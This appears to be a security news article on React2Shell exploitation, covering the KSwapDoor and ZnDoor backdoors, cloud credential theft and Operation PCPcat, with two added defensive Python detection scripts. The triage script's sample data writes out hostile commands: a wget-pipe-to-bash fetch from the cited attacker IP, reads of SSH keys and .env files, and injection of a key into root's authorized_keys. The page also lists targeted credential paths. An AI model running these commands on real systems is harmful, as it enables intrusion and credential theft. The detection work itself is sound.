React2Shell is actively being weaponized to plant Linux backdoors, and the threat landscape around it is expanding fast.
The security flaw known as React2Shell is being weaponized by multiple adversaries to drop malware families such as KSwapDoor and ZnDoor. This conclusion comes from analyses by Palo Alto Networks Unit 42 and NTT Security, who describe a troubling trend of targeted exploitation and post-exploitation activity.
KSwapDoor is described by Justin Moore, senior threat intel researcher at Unit 42, as a professionally crafted remote access tool built for stealth. It forms an internal mesh network so compromised servers can communicate covertly, making blocks and detections more difficult. The malware uses strong encryption to conceal its communications and includes a “sleeper” mode that can be awakened by a secret, invisible signal to bypass firewalls.
Unit 42 notes that what was once misclassified as BPFDoor actually represents a Linux backdoor with interactive shell capabilities, command execution, file operations, and lateral movement scanning. It also masquerades as a legitimate Linux kernel swap daemon to avoid detection.
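The masquerading technique just described lends itself to a simple host-side check. The Python script below is an added example, not code from Unit 42's report or from any analyzed sample: it parses constructed `ps -eo pid,ppid,comm,args` output and flags processes that carry a kernel-thread name but are not children of kthreadd (PID 2), or that show a real binary path or arguments, which genuine kernel threads never have. The PIDs, paths and the set of kernel-thread names are assumptions made for the example; the page does not state how KSwapDoor names its process.

```python
"""Flag userland processes posing as Linux kernel threads (e.g. a fake kswapd).

Heuristic: genuine kernel threads are children of kthreadd (PID 2), have no
executable on disk and no command-line arguments, so `ps` shows their args
column as the bracketed name only. A process that borrows a kernel thread's
name but has PPID != 2, a real binary path, or extra arguments is suspicious.
"""
import re
from typing import Dict, List

# Kernel-thread names worth watching (assumed set; extend per distribution).
KERNEL_THREAD_NAMES = {
    "kswapd0", "kthreadd", "ksoftirqd", "kworker", "migration",
    "rcu_sched", "khugepaged",
}

# Constructed sample of `ps -eo pid,ppid,comm,args` output (not real data).
SAMPLE_PS = """\
  PID  PPID COMMAND         COMMAND
    1     0 systemd         /sbin/init
    2     0 kthreadd        [kthreadd]
   90     2 kswapd0         [kswapd0]
   91     2 kworker/0:1     [kworker/0:1]
 4242     1 kswapd0         /tmp/.x/kswapd0
 4243  4242 kswapd0         [kswapd0] -c 45.76.155.14:443
 5000     1 sshd            /usr/sbin/sshd -D
"""


def parse_ps(text: str) -> List[Dict[str, object]]:
    """Turn ps output into rows; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)  # pid, ppid, comm, rest-of-line args
        if len(parts) < 4:
            continue
        pid, ppid, comm, args = parts
        rows.append({"pid": int(pid), "ppid": int(ppid), "comm": comm, "args": args})
    return rows


def base_name(comm: str) -> str:
    """kworker/0:1 -> kworker, ksoftirqd/3 -> ksoftirqd."""
    return re.split(r"[/:]", comm)[0]


def find_fake_kernel_threads(rows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return processes with a kernel-thread name that fail the kernel-thread invariants."""
    findings = []
    for r in rows:
        if base_name(str(r["comm"])) not in KERNEL_THREAD_NAMES:
            continue
        reasons = []
        # kthreadd itself (PID 2) is the one kernel thread not parented by PID 2.
        if r["ppid"] != 2 and r["pid"] != 2:
            reasons.append(f"parent is PID {r['ppid']}, not kthreadd (2)")
        # Real kernel threads show only "[name]" in the args column.
        if not re.fullmatch(r"\[[^\]]+\]", str(r["args"])):
            reasons.append(f"has a real path or arguments: {r['args']}")
        if reasons:
            findings.append({"pid": r["pid"], "comm": r["comm"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_fake_kernel_threads(parse_ps(SAMPLE_PS)):
        print(f"PID {f['pid']} ({f['comm']}): " + "; ".join(f["reasons"]))
```

On a live host, replace `SAMPLE_PS` with the output of `ps -eo pid,ppid,comm,args`; a process that trips either check deserves a look at `/proc/<pid>/exe` and its open sockets, since a kernel thread has neither.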
In a related thread, NTT Security reports that organizations in Japan are targeted by campaigns deploying ZnDoor via React2Shell. ZnDoor has been observed in the wild since at least December 2023 and is deployed by running a bash command to fetch the payload from a remote server (for example, 45.76.155.14) with wget, then executing it. Once installed, ZnDoor operates as a remote access Trojan capable of receiving and carrying out commands from actor-controlled infrastructure.
The list of available commands includes:
- shell: run a command
- interactiveshell: start an interactive session
- explorer: enumerate directories
- explorercat: display a file’s contents
- explorerdelete: remove a file
- explorerupload: download a file from the server
- explorerdownload: upload a file to the server
- system: collect system information
- changetimefile: modify a file’s timestamp
- socketquickstartstreams: launch a SOCKS5 proxy
- startinportforward: enable port forwarding
- stopin_port: disable port forwarding
This activity unfolds against the backdrop of CVE-2025-55182 (scoring a near-perfect 10.0 on CVSS), which has been exploited by several threat actors to execute arbitrary commands post-exploitation and to establish footholds across compromised networks. Notably, some operators set up reverse shells to known Cobalt Strike infrastructure and deployed remote monitoring tools like MeshAgent, while also manipulating authorized_keys and enabling root access where possible.
Payloads observed in these campaigns include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. Attackers frequently leverage Cloudflare Tunnels (notably endpoints like "*.trycloudflare.com") to evade defenses, while conducting environment reconnaissance to facilitate lateral movement and credential theft.
Credential harvesting is a key focus for several campaigns. Microsoft Defender notes that attackers target cloud endpoints—Azure IMDS, AWS, GCP, and Tencent Cloud—to harvest identity tokens and deepen access into cloud environments. They have also used secret discovery tools such as TruffleHog and Gitleaks, alongside custom scripts, to exfiltrate credentials including OpenAI API keys, Databricks tokens, and Kubernetes service-account credentials. Tools like Azure CLI (az) and Azure Developer CLI (azd) were employed to obtain tokens.
Additional analyses from Beelzebub describe campaigns exploiting Next.js vulnerabilities (including CVE-2025-29927 and CVE-2025-66478) to systematically harvest sensitive data, such as:
- Environment files (.env, .env.local, .env.production, .env.development)
- System environment variables (printenv, env)
- SSH keys (e.g., ~/.ssh/id_rsa, ~/.ssh/id_ed25519, /root/.ssh/*)
- Cloud credentials (e.g., ~/.aws/credentials, ~/.docker/config.json)
- Git credentials (e.g., ~/.git-credentials, ~/.gitconfig)
- Command history (last 100 commands from ~/.bash_history)
- Critical system files (e.g., /etc/shadow, /etc/passwd)
Beyond credential theft, the malware establishes persistence to survive reboots, installs a SOCKS5 proxy, opens a reverse shell to a remote host, and deploys a React scanner to widen propagation. The operation, dubbed Operation PCPcat, is believed to have compromised tens of thousands of servers, underscoring its scale and potential impact on industrial data ecosystems.
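The post-exploitation behaviours described above (fetch-and-execute droppers, reads of .env and key files, cloud metadata token requests, authorized_keys tampering, secret-scanner abuse, Cloudflare Tunnel use) are all visible in process command lines. The Python triage script below is an added example, not code from any of the cited reports: it scores constructed command lines against weighted rules derived from those behaviours and alerts when the accumulated score crosses a threshold. The sample commands, weights and threshold are assumptions made for the example.

```python
"""Score shell command lines against the post-exploitation patterns reported
for the React2Shell campaigns. Feed it auditd EXECVE records or an EDR's
process command-line field; the input here is a constructed sample.
"""
import re
from typing import Dict, List, Tuple

# (rule name, pattern, weight). Weights are assumptions: a lone low-weight hit
# (e.g. reading shell history) should not alert, a combination should.
RULES: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("fetch_and_execute",
     re.compile(r"\b(wget|curl)\b.*(\|\s*(ba)?sh\b|&&\s*(\./|sh\s|bash\s|chmod\s))"), 5),
    ("env_file_read",
     re.compile(r"\.env(\.(local|production|development))?\b"), 3),
    ("ssh_key_access",
     re.compile(r"\.ssh/(id_[a-z0-9]+|authorized_keys)"), 4),
    ("cloud_credential_file",
     re.compile(r"\.aws/credentials|\.docker/config\.json|\.git-credentials"), 3),
    ("shadow_or_passwd_read",
     re.compile(r"/etc/(shadow|passwd)\b"), 3),
    ("shell_history_read",
     re.compile(r"\.bash_history"), 2),
    ("metadata_token_request",  # AWS/Azure IMDS, GCP and Tencent metadata hosts
     re.compile(r"169\.254\.169\.254|metadata\.google\.internal|metadata\.tencentyun\.com"), 4),
    ("secret_scanner",
     re.compile(r"\b(trufflehog|gitleaks)\b", re.I), 3),
    ("cloudflare_tunnel",
     re.compile(r"trycloudflare\.com|\bcloudflared\b"), 3),
    ("cloud_cli_token",  # az / azd token retrieval
     re.compile(r"\b(az|azd)\s+(account\s+get-access-token|auth\s+token)\b"), 3),
]

ALERT_THRESHOLD = 3  # assumed; tune against your own baseline


def score_command(cmd: str) -> Tuple[int, List[str]]:
    """Return (total weight, names of matching rules) for one command line."""
    hits = [(name, w) for name, rx, w in RULES if rx.search(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Return the 1-based line numbers, scores and rules for lines at or above the threshold."""
    findings = []
    for n, line in enumerate(lines, 1):
        score, hits = score_command(line)
        if score >= ALERT_THRESHOLD:
            findings.append({"line": n, "score": score, "rules": hits, "cmd": line})
    return findings


# Constructed sample command lines (not real telemetry); the IP is the one named in the text.
SAMPLE_COMMANDS = [
    "ls -la /var/www/app",
    "wget -qO- http://45.76.155.14/x.sh | bash",
    "cat /var/www/app/.env.production",
    "cat ~/.ssh/id_rsa ~/.ssh/id_ed25519",
    "echo 'ssh-ed25519 AAAA...EXAMPLE attacker@example' >> /root/.ssh/authorized_keys",
    "curl -s -H 'Metadata: true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'",
    "trufflehog filesystem /var/www --json",
    "az account get-access-token --resource https://management.azure.com/",
    "tail -n 100 ~/.bash_history",
    "cat ~/.bash_history ~/.aws/credentials",
    "git status",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_COMMANDS):
        print(f"line {f['line']} score {f['score']} {f['rules']}: {f['cmd']}")
```

Note the design choice in the weights: `tail -n 100 ~/.bash_history` alone stays below the threshold because administrators do that too, but the same read combined with `~/.aws/credentials` scores 5 and alerts. The fetch-and-execute rule is weighted highest because a `wget ... | bash` from a web-application worker is the delivery step the page describes for ZnDoor and has almost no benign counterpart.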
Shadowserver Foundation currently tracks more than 111,000 IP addresses vulnerable to React2Shell attacks, more than 78,000 of them in the United States, with notable exposure in Germany, France, and India. GreyNoise data from the past day shows hundreds of malicious IPs across the U.S., India, the U.K., Singapore, and the Netherlands actively participating in exploitation.